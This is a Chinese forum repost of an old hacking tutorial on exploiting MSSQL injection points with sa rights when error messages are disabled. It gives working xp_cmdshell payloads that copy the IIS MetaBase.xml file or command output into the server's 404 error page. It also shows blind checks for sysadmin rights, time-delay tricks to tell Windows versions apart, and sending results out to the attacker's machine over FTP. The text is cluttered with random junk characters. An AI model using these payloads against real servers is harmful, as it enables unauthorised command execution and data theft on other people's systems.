遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。( W' i" p4 ^- Y& ]! L
& V8 a+ X! |7 t2 H
虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。- f, ~# k. | K6 j' {; v
. H. h9 S: @# K; H% k6 u
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
+ {$ A% }. G2 L' g& U
; Q) X" n; S# c' k0 O. T- A s; J IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm- S+ X8 O+ C- R2 S
6 v1 a! s# x- R l5 j( W
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--7 b$ E. w. S; o. D+ w" } a, y8 c9 z
0 T) ~9 _: e1 V6 q. K
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。% @5 I; e; y. Q
9 B* i* L7 A- n9 ~1 I, C3 b1 \
执行命令得到回显/ x: Q0 O) c N, d8 F4 d: k
2 [6 e0 u: S6 \ a7 f9 {3 A
通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
" W; \5 v1 k# F- y! g
0 L$ o6 P+ k& G y& J 得到文件也shi相同,把文件copy到404b.htm就行了! B% s6 F9 _" s- W9 V8 h, y/ v
) G. x- j1 ]: `1 q6 \8 Q8 p. r' E by 28ice, 2008/6/26
T( _( L, a( a! ^3 m! d
" S3 q$ b# Z2 r$ f 摘自 28度的冰
6 r3 z" P; r& v
" m) V7 Y+ V& ]/ b6 O 盲注判断权限和操作系统版本
# `6 x2 ~. j( v) b3 l) k$ f' N$ [# V# y4 i6 r
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
! |7 P L( N8 ]% K2 G i# }* v. }8 Z' C- k, q
最简单的,可能以用这样的方法:9 T" y* x1 O' _
1 ~# f, N) F$ Z) \3 E) p; c 1=(select IS_SRVROLEMEMBER(’sysadmin’))
0 y4 Z+ }, ~; x: p: X ?
F: l! z8 P% d1 ^( a9 T- l0 K+ J 当然,有些情况下,这个方法并不奏效。
" d" j: ^$ m5 h0 V0 N* C+ S3 n0 i6 f* s( ~8 d8 s
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
; y* Q4 M0 [1 q0 L9 |; L
9 }8 S4 Z3 M+ ~ 有个3办法可能以解决这个问题: {+ I/ v' \, o1 k
, Q5 t$ {& n9 e4 f2 S" O! v
a.把执行结果写到404b.htm,具体请看我的上一篇文章
8 N, p* o( i" R4 p: D% w: i
; Q) a2 W7 Q. E2 M7 x; T b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟: f7 @% O s8 ?. @1 x8 q
3 p4 E! b! X1 U. u2 G0 K7 {
c.如果1433端口可能以连接,那干脆新建个sql登录3 G7 p3 h1 l4 T: A9 r! E" ]- {
5 h% Q X) ]6 H9 U. I p* u d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
0 m0 g' A+ G+ E9 A' w2 S7 [& e' ^0 Q7 C
还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
, q2 f- O: J! u% n; H6 P* |8 ^/ I( @! F% ?1 C9 b; C
很简单
# [7 y2 a9 N G0 n- v# W" A. ~- k6 W
/ t# }- D3 {# l5 I) r/ { W 执行systeminfo3 o L! A3 H4 ?7 Q# X0 q+ ~
6 r7 p2 R: S/ C
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对